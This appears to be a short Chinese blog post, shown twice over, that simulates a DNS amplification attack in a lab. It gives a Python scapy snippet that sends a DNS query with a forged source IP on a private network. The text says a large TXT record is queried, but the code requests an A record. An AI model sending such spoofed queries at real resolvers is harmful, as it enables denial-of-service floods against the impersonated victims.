用scapy模拟DNS放大攻击
2011-01-24 18:01
751 查看
首先,DNS放大攻击,简单解释有两点:
1.伪造源IP为其他人的ip地址
2.被请求的记录,要求比较大,比如TXT格式,4000KB
在A机器上,向DNS发送查询那个TXT的记录,并伪造成别人的ip,即可理解为DNS放大攻击。
可以用python的scapy模拟:
from scapy import *
a = IP(dst='10.32.8.11',src='10.32.132.85') #10.32.132.85即为伪造的源ip
b = UDP(dport='53')
c = DNS(id=1,qr=0,opcode=0,tc=0,rd=1,qdcount=1,ancount=0,nscount=0,arcount=0)
c.qd=DNSQR(qname='www.qq.com',qtype=1,qclass=1)
p = a/b/c
send(p)
模拟结束。
在10.32.132.85上抓dns的包,就会收到一条DNS响应,是10.32.8.11发来的。
1.伪造源IP为其他人的ip地址
2.被请求的记录,要求比较大,比如TXT格式,4000KB
在A机器上,向DNS发送查询那个TXT的记录,并伪造成别人的ip,即可理解为DNS放大攻击。
可以用python的scapy模拟:
from scapy import *
a = IP(dst='10.32.8.11',src='10.32.132.85') #10.32.132.85即为伪造的源ip
b = UDP(dport='53')
c = DNS(id=1,qr=0,opcode=0,tc=0,rd=1,qdcount=1,ancount=0,nscount=0,arcount=0)
c.qd=DNSQR(qname='www.qq.com',qtype=1,qclass=1)
p = a/b/c
send(p)
模拟结束。
在10.32.132.85上抓dns的包,就会收到一条DNS响应,是10.32.8.11发来的。
相关文章推荐
- Python中使用scapy模拟数据包实现arp攻击、dns放大攻击例子
- Python中使用scapy模拟数据包实现arp攻击、dns放大攻击例子
- DNS反射放大攻击分析——DNS反射放大攻击主要是利用DNS回复包比请求包大的特点,放大流量,伪造请求包的源IP地址为受害者IP,将应答包的流量引入受害的服务器
- MDNS的漏洞报告——mdns的最大问题是允许广域网的mdns单播查询,这会暴露设备信息,或者被利用用于dns放大攻击
- 使用bind新功能rate-limit防止DNS放大攻击和流量攻击
- 【安全牛学习笔记】DNS放大攻击
- DNS Amplification Attack PoC(DNS放大攻击)
- 防止DNS放大攻击的有效措施
- 用scapy模拟DNS放大***
- Cloudflare 宣布虚拟 DNS 以防御 DNS 放大攻击
- 理解DNS放大攻击
- MDNS DDoS 反射放大攻击——攻击者假冒被攻击者IP向网络发送DNS请求,域名为“_services._dns-sd._udp.local”,这将引起本地网络中所有提供服务的主机都向被攻击者IP发送DNS响应,列举网络中所有服务
- 利用DNS漏洞攻击的Ruby代码
- DNS攻击代码
- DNS攻击原理与防范
- PHP程序防止ddos,dns,集群服务器攻击
- [李景山php] ddos 攻击 值 DNS Query Flood
- 从百度被攻击事件浅谈 DNS 攻击
- Xshell dns tunnel攻击
- DNS攻击原理与防范